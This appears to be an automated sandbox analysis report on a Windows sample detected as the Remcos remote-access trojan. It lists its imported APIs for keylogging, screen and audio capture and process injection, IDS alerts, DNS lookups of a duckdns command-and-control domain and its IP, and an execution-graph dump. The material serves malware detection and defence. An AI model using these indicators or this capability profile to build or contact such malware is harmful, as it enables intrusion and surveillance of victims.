RT_ICON | 0x79f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
RT_ICON | 0x7b024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
RT_RCDATA | 0x7d5cc | 0x540 | data | | | 1.0081845238095237
RT_GROUP_ICON | 0x7db0c | 0x3e | data | English | United States | 0.8064516129032258
DLL | Import
KERNEL32.dll | FindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
USER32.dll | GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
GDI32.dll | BitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
ADVAPI32.dll | CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
ole32.dll | CoInitializeEx, CoUninitialize, CoGetObject
SHLWAPI.dll | PathFileExistsW, PathFileExistsA, StrToIntA
WINMM.dll | waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
                                            WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                            urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                            gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                            WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-16T18:50:18.157431+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49720 | 94.103.125.196 | 10521 | TCP
2024-10-16T18:50:20.385265+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49725 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 16, 2024 18:50:16.387418985 CEST | 54513 | 53 | 192.168.2.5 | 1.1.1.1
Oct 16, 2024 18:50:17.256797075 CEST | 53 | 54513 | 1.1.1.1 | 192.168.2.5
Oct 16, 2024 18:50:19.092266083 CEST | 54544 | 53 | 192.168.2.5 | 1.1.1.1
Oct 16, 2024 18:50:19.100752115 CEST | 53 | 54544 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 16, 2024 18:50:16.387418985 CEST | 192.168.2.5 | 1.1.1.1 | 0xa97e | Standard query (0) | embargogo237.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 16, 2024 18:50:19.092266083 CEST | 192.168.2.5 | 1.1.1.1 | 0xb45c | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 16, 2024 18:50:17.256797075 CEST | 1.1.1.1 | 192.168.2.5 | 0xa97e | No error (0) | embargogo237.duckdns.org | | 94.103.125.196 | A (IP address) | IN (0x0001) | false
Oct 16, 2024 18:50:19.100752115 CEST | 1.1.1.1 | 192.168.2.5 | 0xb45c | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49725 | 178.237.33.50 | 80 | 1516 | C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Oct 16, 2024 18:50:19.109425068 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                            Host: geoplugin.net
                                            Cache-Control: no-cache
Oct 16, 2024 18:50:20.385216951 CEST | 1164 | IN | HTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
Oct 16, 2024 18:50:20.385272026 CEST | 1164 | IN | HTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
Oct 16, 2024 18:50:20.390446901 CEST | 1164 | IN | HTTP/1.1 200 OK
                                            date: Wed, 16 Oct 2024 16:50:19 GMT
                                            server: Apache
                                            content-length: 956
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                            Target ID:0
                                            Start time:12:50:14
                                            Start date:16/10/2024
                                            Path:C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe"
                                            Imagebase:0x400000
                                            File size:494'592 bytes
                                            MD5 hash:3904BABB53D5BBDAB7E0785A533A58D7
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:4.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:21%
                                              Total number of Nodes:1419
                                              Total number of Limit Nodes:66
40ef09 47615->47619 47618 40effc 48143 41ce2c 88 API calls ___scrt_get_show_window_mode 47618->48143 47621 401e65 22 API calls 47619->47621 47620 40f01f 47625 402093 28 API calls 47620->47625 47623 40ef12 47621->47623 47626 41bcef 28 API calls 47623->47626 47624 40f003 CreateThread 47624->47620 48977 41d4ee 10 API calls 47624->48977 47628 40f034 47625->47628 47627 40ef1e 47626->47627 48139 40f4af 107 API calls 47627->48139 47629 402093 28 API calls 47628->47629 47631 40f043 47629->47631 47892 41b580 47631->47892 47632 40ef23 47632->47591 47634 40ef2a 47632->47634 47634->47516 47636 401e65 22 API calls 47637 40f054 47636->47637 47638 401e65 22 API calls 47637->47638 47639 40f066 47638->47639 47640 401e65 22 API calls 47639->47640 47641 40f086 47640->47641 47642 43bb2c _strftime 40 API calls 47641->47642 47643 40f093 47642->47643 47644 401e65 22 API calls 47643->47644 47645 40f09e 47644->47645 47646 401e65 22 API calls 47645->47646 47647 40f0af 47646->47647 47648 401e65 22 API calls 47647->47648 47649 40f0c4 47648->47649 47650 401e65 22 API calls 47649->47650 47651 40f0d5 47650->47651 47652 40f0dc StrToIntA 47651->47652 47916 409e1f 47652->47916 47655 401e65 22 API calls 47656 40f0f7 47655->47656 47657 40f103 47656->47657 47658 40f13c 47656->47658 48144 43455e 47657->48144 47660 401e65 22 API calls 47658->47660 47662 40f14c 47660->47662 47665 40f194 47662->47665 47666 40f158 47662->47666 47663 401e65 22 API calls 47664 40f11f 47663->47664 47667 40f126 CreateThread 47664->47667 47669 401e65 22 API calls 47665->47669 47668 43455e new 22 API calls 47666->47668 47667->47658 48975 41a045 110 API calls 2 library calls 47667->48975 47670 40f161 47668->47670 47672 40f19d 47669->47672 47671 401e65 22 API calls 47670->47671 47673 40f173 47671->47673 47674 40f207 47672->47674 47675 40f1a9 47672->47675 47678 40f17a CreateThread 47673->47678 47676 401e65 22 API calls 47674->47676 47677 401e65 22 API calls 47675->47677 47679 40f210 47676->47679 47680 40f1b9 47677->47680 
47678->47665 48980 41a045 110 API calls 2 library calls 47678->48980 47681 40f255 47679->47681 47682 40f21c 47679->47682 47683 401e65 22 API calls 47680->47683 47941 41b69e GetComputerNameExW GetUserNameW 47681->47941 47685 401e65 22 API calls 47682->47685 47686 40f1ce 47683->47686 47688 40f225 47685->47688 48151 40da23 32 API calls 47686->48151 47693 401e65 22 API calls 47688->47693 47689 401f13 28 API calls 47690 40f269 47689->47690 47692 401f09 11 API calls 47690->47692 47695 40f272 47692->47695 47696 40f23a 47693->47696 47694 40f1e1 47697 401f13 28 API calls 47694->47697 47698 40f27b SetProcessDEPPolicy 47695->47698 47699 40f27e CreateThread 47695->47699 47706 43bb2c _strftime 40 API calls 47696->47706 47700 40f1ed 47697->47700 47698->47699 47701 40f293 CreateThread 47699->47701 47702 40f29f 47699->47702 48948 40f7e2 47699->48948 47703 401f09 11 API calls 47700->47703 47701->47702 48976 412132 139 API calls 47701->48976 47704 40f2b4 47702->47704 47705 40f2a8 CreateThread 47702->47705 47707 40f1f6 CreateThread 47703->47707 47710 40f307 47704->47710 47711 402093 28 API calls 47704->47711 47705->47704 48978 412716 38 API calls ___scrt_get_show_window_mode 47705->48978 47708 40f247 47706->47708 47707->47674 48979 401be9 50 API calls _strftime 47707->48979 48152 40c19d 7 API calls 47708->48152 47952 41353a RegOpenKeyExA 47710->47952 47712 40f2d7 47711->47712 48153 4052fd 28 API calls 47712->48153 47717 40f328 47719 41bcef 28 API calls 47717->47719 47721 40f338 47719->47721 48154 413656 31 API calls 47721->48154 47726 40f34e 47727 401f09 11 API calls 47726->47727 47730 40f359 47727->47730 47728 40f381 DeleteFileW 47729 40f388 47728->47729 47728->47730 47729->47537 47730->47537 47730->47728 47731 40f36f Sleep 47730->47731 47731->47730 47732->47410 47733->47414 47734->47420 47735->47417 47736->47427 47737->47428 47738->47430 47739->47433 47740->47437 47741->47439 47742->47442 47743->47440 47745 434bb8 GetStartupInfoW 47744->47745 47745->47448 47747 44f0eb 47746->47747 
47748 44f0e2 47746->47748 47747->47451 47751 44efd8 49 API calls 5 library calls 47748->47751 47750->47451 47751->47747 47753 41cc20 LoadLibraryA GetProcAddress 47752->47753 47754 41cc10 GetModuleHandleA GetProcAddress 47752->47754 47755 41cc49 44 API calls 47753->47755 47756 41cc39 LoadLibraryA GetProcAddress 47753->47756 47754->47753 47755->47456 47756->47755 48157 41b539 FindResourceA 47757->48157 47760 43bda0 _Yarn 21 API calls 47761 40f428 _Yarn 47760->47761 47762 4020b7 28 API calls 47761->47762 47763 40f443 47762->47763 47764 401fe2 28 API calls 47763->47764 47765 40f44e 47764->47765 47766 401fd8 11 API calls 47765->47766 47767 40f457 47766->47767 47768 43bda0 _Yarn 21 API calls 47767->47768 47769 40f468 _Yarn 47768->47769 48160 406e13 47769->48160 47771 40f49b 47771->47458 47773 4020df 11 API calls 47772->47773 47793 41bebf 47773->47793 47774 41bf2f 47775 401fd8 11 API calls 47774->47775 47776 41bf61 47775->47776 47777 401fd8 11 API calls 47776->47777 47779 41bf69 47777->47779 47778 41bf31 47780 4041a2 28 API calls 47778->47780 47782 401fd8 11 API calls 47779->47782 47783 41bf3d 47780->47783 47784 40ea5f 47782->47784 47785 401fe2 28 API calls 47783->47785 47794 40fb52 47784->47794 47787 41bf46 47785->47787 47786 401fe2 28 API calls 47786->47793 47788 401fd8 11 API calls 47787->47788 47790 41bf4e 47788->47790 47789 401fd8 11 API calls 47789->47793 48167 41cec5 28 API calls 47790->48167 47793->47774 47793->47778 47793->47786 47793->47789 48163 4041a2 47793->48163 48166 41cec5 28 API calls 47793->48166 47795 40fb5e 47794->47795 47797 40fb65 47794->47797 48174 402163 11 API calls 47795->48174 47797->47466 47799 401e6d 47798->47799 47800 401e75 47799->47800 48175 402158 22 API calls 47799->48175 47800->47473 47804 4020df 11 API calls 47803->47804 47805 40532a 47804->47805 48176 4032a0 47805->48176 47807 405346 47807->47482 48180 4051ef 47808->48180 47810 406391 48184 402055 47810->48184 47813 401fe2 47814 401ff1 47813->47814 47821 402039 47813->47821 47815 
4023ce 11 API calls 47814->47815 47816 401ffa 47815->47816 47817 40203c 47816->47817 47819 402015 47816->47819 47818 40267a 11 API calls 47817->47818 47818->47821 48216 403098 28 API calls 47819->48216 47821->47490 47823 401fd2 47822->47823 47824 401fc9 47822->47824 47823->47499 48217 4025e0 28 API calls 47824->48217 48218 401fab 47826->48218 47828 40d0ae CreateMutexA GetLastError 47828->47515 48219 41c048 47829->48219 47834 401fe2 28 API calls 47835 41b390 47834->47835 47836 401fd8 11 API calls 47835->47836 47837 41b398 47836->47837 47838 4135e1 31 API calls 47837->47838 47840 41b3ee 47837->47840 47839 41b3c1 47838->47839 47841 41b3cc StrToIntA 47839->47841 47840->47522 47842 41b3e3 47841->47842 47843 41b3da 47841->47843 47845 401fd8 11 API calls 47842->47845 48228 41cffa 22 API calls 47843->48228 47845->47840 47847 407765 47846->47847 47848 413584 3 API calls 47847->47848 47849 40776c 47848->47849 47849->47532 47849->47533 47851 41bd03 47850->47851 48229 40b93f 47851->48229 47853 41bd0b 47853->47549 47855 401f22 47854->47855 47862 401f6a 47854->47862 47856 402252 11 API calls 47855->47856 47857 401f2b 47856->47857 47858 401f6d 47857->47858 47860 401f46 47857->47860 48262 402336 47858->48262 48261 40305c 28 API calls 47860->48261 47863 401f09 47862->47863 47864 402252 11 API calls 47863->47864 47865 401f12 47864->47865 47865->47562 47867 4139a0 47866->47867 47868 406e13 28 API calls 47867->47868 47869 4139b5 47868->47869 47870 4020f6 28 API calls 47869->47870 47871 4139c5 47870->47871 47872 4137aa 14 API calls 47871->47872 47873 4139cf 47872->47873 47874 401fd8 11 API calls 47873->47874 47875 4139dc 47874->47875 47875->47609 47877 40209b 47876->47877 47878 4023ce 11 API calls 47877->47878 47879 4020a6 47878->47879 48266 4024ed 47879->48266 47883 4137c3 47882->47883 47884 4137fa 47882->47884 47887 4137d5 RegSetValueExA RegCloseKey 47883->47887 47885 401fd8 11 API calls 47884->47885 47886 40efd9 47885->47886 47886->47612 47887->47884 47889 43bb45 _strftime 
47888->47889 48270 43ae83 47889->48270 47891 40eff2 47891->47618 47891->47620 47893 41b631 47892->47893 47894 41b596 GetLocalTime 47892->47894 47895 401fd8 11 API calls 47893->47895 47896 40531e 28 API calls 47894->47896 47897 41b639 47895->47897 47898 41b5d8 47896->47898 47899 401fd8 11 API calls 47897->47899 47900 406383 28 API calls 47898->47900 47902 40f048 47899->47902 47901 41b5e4 47900->47901 48298 402f10 47901->48298 47902->47636 47905 406383 28 API calls 47906 41b5fc 47905->47906 48303 40723b 77 API calls 47906->48303 47908 41b60a 47909 401fd8 11 API calls 47908->47909 47910 41b616 47909->47910 47911 401fd8 11 API calls 47910->47911 47912 41b61f 47911->47912 47913 401fd8 11 API calls 47912->47913 47914 41b628 47913->47914 47915 401fd8 11 API calls 47914->47915 47915->47893 47917 409e3d _wcslen 47916->47917 47918 409e48 47917->47918 47919 409e5f 47917->47919 47920 40da6f 32 API calls 47918->47920 47921 40da6f 32 API calls 47919->47921 47922 409e50 47920->47922 47923 409e67 47921->47923 47924 401f13 28 API calls 47922->47924 47925 401f13 28 API calls 47923->47925 47927 409e5a 47924->47927 47926 409e75 47925->47926 47928 401f09 11 API calls 47926->47928 47930 401f09 11 API calls 47927->47930 47929 409e7d 47928->47929 48322 409196 28 API calls 47929->48322 47932 409eb4 47930->47932 48307 40a144 47932->48307 47933 409e8f 48323 403014 47933->48323 47938 401f13 28 API calls 47939 409ea4 47938->47939 47940 401f09 11 API calls 47939->47940 47940->47927 48527 40417e 47941->48527 47946 403014 28 API calls 47947 41b703 47946->47947 47948 401f09 11 API calls 47947->47948 47949 41b70c 47948->47949 47950 401f09 11 API calls 47949->47950 47951 40f25e 47950->47951 47951->47689 47953 41355b RegQueryValueExA RegCloseKey 47952->47953 47954 40f31f 47952->47954 47953->47954 47954->47561 47954->47717 47956 40f3cd 47955->47956 47957 413a7a RegDeleteValueW 47955->47957 47956->47556 47957->47956 47959 40dd96 47958->47959 47960 41353a 3 API calls 47959->47960 47961 40dd9d 
47960->47961 47962 40ddbc 47961->47962 48621 401707 47961->48621 47966 414f65 47962->47966 47964 40ddaa 48624 4138b2 RegCreateKeyA 47964->48624 47967 4020df 11 API calls 47966->47967 47968 414f79 47967->47968 48638 41b944 47968->48638 47971 4020df 11 API calls 47972 414f8f 47971->47972 47973 401e65 22 API calls 47972->47973 47974 414f9d 47973->47974 47975 43bb2c _strftime 40 API calls 47974->47975 47976 414faa 47975->47976 47977 414fbc 47976->47977 47978 414faf Sleep 47976->47978 47979 402093 28 API calls 47977->47979 47978->47977 47980 414fcb 47979->47980 47981 401e65 22 API calls 47980->47981 47982 414fd4 47981->47982 47983 4020f6 28 API calls 47982->47983 47984 414fdf 47983->47984 47985 41beac 28 API calls 47984->47985 47986 414fe7 47985->47986 48642 40489e WSAStartup 47986->48642 47988 414ff1 47989 401e65 22 API calls 47988->47989 47990 414ffa 47989->47990 47991 401e65 22 API calls 47990->47991 48041 415079 47990->48041 47992 415013 47991->47992 47994 401e65 22 API calls 47992->47994 47993 4020f6 28 API calls 47993->48041 47995 415024 47994->47995 47997 401e65 22 API calls 47995->47997 47996 41beac 28 API calls 47996->48041 47998 415035 47997->47998 47999 401e65 22 API calls 47998->47999 48001 415046 47999->48001 48000 406c59 28 API calls 48000->48041 48004 401e65 22 API calls 48001->48004 48002 402f10 28 API calls 48002->48041 48003 401fe2 28 API calls 48003->48041 48005 415057 48004->48005 48007 401e65 22 API calls 48005->48007 48006 401fd8 11 API calls 48006->48041 48008 415069 48007->48008 48778 40473d 89 API calls 48008->48778 48010 40531e 28 API calls 48010->48041 48011 406383 28 API calls 48011->48041 48013 4151c7 WSAGetLastError 48779 41cb72 30 API calls 48013->48779 48018 402093 28 API calls 48019 4151d7 48018->48019 48019->48018 48021 41b580 80 API calls 48019->48021 48024 401e65 22 API calls 48019->48024 48025 401e8d 11 API calls 48019->48025 48026 43bb2c _strftime 40 API calls 48019->48026 48019->48041 48060 415aac CreateThread 48019->48060 48061 
401fd8 11 API calls 48019->48061 48062 401f09 11 API calls 48019->48062 48780 4052fd 28 API calls 48019->48780 48782 40b08c 85 API calls 48019->48782 48783 404e26 99 API calls 48019->48783 48021->48019 48022 401e65 22 API calls 48022->48041 48024->48019 48025->48019 48027 415b0a Sleep 48026->48027 48027->48019 48028 402093 28 API calls 48028->48041 48029 41b580 80 API calls 48029->48041 48032 409097 28 API calls 48032->48041 48033 441ed1 20 API calls 48033->48041 48034 413733 3 API calls 48034->48041 48035 4135e1 31 API calls 48035->48041 48036 40417e 28 API calls 48036->48041 48040 41bc1f 28 API calls 48040->48041 48041->47993 48041->47996 48041->48000 48041->48002 48041->48003 48041->48006 48041->48010 48041->48011 48041->48013 48041->48019 48041->48022 48041->48028 48041->48029 48041->48032 48041->48033 48041->48034 48041->48035 48041->48036 48041->48040 48042 401e65 22 API calls 48041->48042 48643 414f24 48041->48643 48648 40482d 48041->48648 48655 404f51 48041->48655 48670 4048c8 connect 48041->48670 48730 41b871 48041->48730 48733 4145f8 48041->48733 48736 40ddc4 48041->48736 48742 41bcd3 48041->48742 48745 41bdaf 48041->48745 48043 415474 GetTickCount 48042->48043 48044 41bc1f 28 API calls 48043->48044 48050 415491 48044->48050 48046 41bc1f 28 API calls 48046->48050 48048 41bdaf 28 API calls 48048->48050 48050->48046 48050->48048 48052 402ea1 28 API calls 48050->48052 48053 402f10 28 API calls 48050->48053 48054 406383 28 API calls 48050->48054 48056 401fd8 11 API calls 48050->48056 48057 401f09 11 API calls 48050->48057 48749 41bb77 GetLastInputInfo GetTickCount 48050->48749 48750 41bb27 48050->48750 48755 40f90c GetLocaleInfoA 48050->48755 48758 402f31 28 API calls 48050->48758 48759 404c10 48050->48759 48781 404aa1 61 API calls _Yarn 48050->48781 48052->48050 48053->48050 48054->48050 48056->48050 48057->48050 48060->48019 48938 41ada8 106 API calls 48060->48938 48061->48019 48062->48019 48063->47474 48064->47481 48065->47486 48068 4020df 11 API calls 
